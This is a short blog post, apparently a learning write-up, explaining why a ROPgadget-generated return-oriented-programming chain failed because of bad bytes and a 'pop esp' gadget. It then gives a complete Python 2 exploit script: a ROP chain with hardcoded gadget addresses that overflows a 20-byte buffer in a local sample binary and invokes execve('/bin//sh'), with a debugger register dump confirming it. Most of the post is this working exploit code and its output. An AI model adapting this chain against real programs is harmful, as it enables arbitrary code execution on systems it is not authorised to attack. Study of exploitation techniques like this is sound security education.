[ROP] Some Reasons why ROP Chain Fail

Posted by hwchen18546 on July 30, 2014
Posted in: ROP. Leave a comment 
1. Avoid bad bytes
I used "ROPgadget.py --ropchain" to generate shellcode.
However, it didn't work because of bad bytes. 
 
p += pack('<I', 0x0809a346) # inc eax ; ret
When program loaded 0x09(\t), it won't read payload anymore

$ ../ROPgadget.py --binary ./sample --ropchain --badbytes "20|00|09"

0x20 = space, 0x00 = , 0x09 = \t


2. Don't pop esp
Bypass bad bytes, and it generate
 
p += pack('<I', 0x080c2105) # inc eax ; pop esp ; ret
p += pack('<I', 0x41414141) # padding
to replace 
p += pack('<I', 0x0809a346) # inc eax ; ret

However, you have to add eax to 11.
first time you pop esp, and it will store 0x41414141.
Next time you pop, it will access(pop) the value stored in 0x41414141
and get nothing!

Chain it by yourself!
$ ../ROPgadget.py --binary ./sample | grep "inc eax"

and find this one
0x0805083c : inc eax ; pop edi ; ret
It change $edi to 0x41414141, better!

#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = 'a'*32 # buff[20]

p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080c2156) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef064) # @ .data + 4
p += pack('<I', 0x080c2156) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x080513d0) # xor eax, eax ; ret
p += pack('<I', 0x0808e77d) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481ec) # pop ebx ; ret
p += pack('<I', 0x080ef060) # @ .data
p += pack('<I', 0x080e3a8e) # pop ecx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x08056fba) # pop edx ; ret
p += pack('<I', 0x080ef068) # @ .data + 8
p += pack('<I', 0x080513d0) # xor eax, eax ; ret
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x0805083c) # inc eax ; pop edi ; ret
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x080493b9) # int 0x80
print p


Mission complete!
[---------------------------registers-----------------------------------]
EAX: 0xb ('\x0b')
EBX: 0x80ef060 ("/bin//sh")
ECX: 0x80ef068 --> 0x0 
EDX: 0x80ef068 --> 0x0 
ESI: 0x0 
EDI: 0x41414141 ('AAAA')
EBP: 0x61616161 ('aaaa')
ESP: 0xbffff2dc --> 0x0 
EIP: 0x80493b9 (:	int    0x80)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[----------------------------------------------------------------------]
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s